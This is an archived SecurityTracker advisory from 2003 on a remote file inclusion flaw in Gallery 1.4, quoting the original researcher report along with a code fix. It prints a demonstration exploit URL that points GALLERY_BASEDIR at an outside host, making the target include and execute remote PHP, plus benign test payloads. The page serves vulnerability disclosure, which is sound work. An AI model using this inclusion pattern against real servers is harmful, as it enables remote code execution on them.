SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   Gallery Vendors:   Gallery Project
Gallery Input Validation Flaw in GALLERY_BASEDIR (Again) Permits Remote Code Execution
SecurityTracker Alert ID:  1007916
SecurityTracker URL:  http://securitytracker.com/id/1007916
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 11 2003
Impact:   Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 1.4
Description:   An include file vulnerability was reported in Gallery. A remote user can execute arbitrary PHP code on the target system.

It is reported that a remtoe user can specify a remote location for the GALLERY_BASEDIR variable to cause a PHP file at the remote location to be included and executed on the target system.

A demonstration exploit URL is provided:

http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/

The above URL will include and execute the contents of the "http://tester/util.php" file.

[Editor's note: The same flaw, or at least a similar flaw, was reported in July 2002 in Alert ID 1004918 and reportedly fixed in Gallery 1.3.1]

Impact:   A remote user can execute arbitrary PHP code, including operating system commands, on the target system. The code will run with the privileges of the target web server.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has indicated that, as a solution, you can change the following Lines in the index.php files in the setup folder from this:

if (!isset($GALLERY_BASEDIR)) {
$GALLERY_BASEDIR = '../';
}

to this:

$GALLERY_BASEDIR = '../';

Vendor URL:  gallery.sourceforge.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Oct 24 2003 (Vendor Issues Fix) Re: Gallery Input Validation Flaw in GALLERY_BASEDIR (Again) Permits Remote Code Execution
The vendor has issued a fix.



 Source Message Contents

Subject:  Gallery 1.4 including file vulnerability




Gallery 1.4 including file vulnerability

-Background Information-
Gallery is a Web-based software product that lets you manage photos on any Web site that offers PHP support. With Gallery you can
 easily create and maintain albums of photos via an intuitive interface. Photo management includes automatic thumbnail creation, image
 resizing, rotation, ordering, captioning, searching, and more. Albums can have read, write, and caption permissions per individual
 authenticated user for an additional level of privacy. Gallery is installed on maybe 20000 Locations.

-Proof of concept-
It is possible to include any php file from a remote host, and execute it on the target's server.
This works:
http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/
If the file "http://tester/util.php" exists, it will be included. This file could look like this if PHP isn't supported on the "tester"-host:

<?php echo "Vulnerable"; ?>

or like this, if PHP is supported on the "tester"-host:

<?php
echo "<?php die(\"Vulnerable\"); ?>";
?>

-Solution-
Change the following Lines in the index.php files in the setup folder:

if (!isset($GALLERY_BASEDIR)) {
	$GALLERY_BASEDIR = '../';
}

to this:

	$GALLERY_BASEDIR = '../';

-Related URLs-
http://gallery.sourceforge.net/
https://sourceforge.net/projects/gallery/

RQ Labs
Rootquest
Switzerland

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC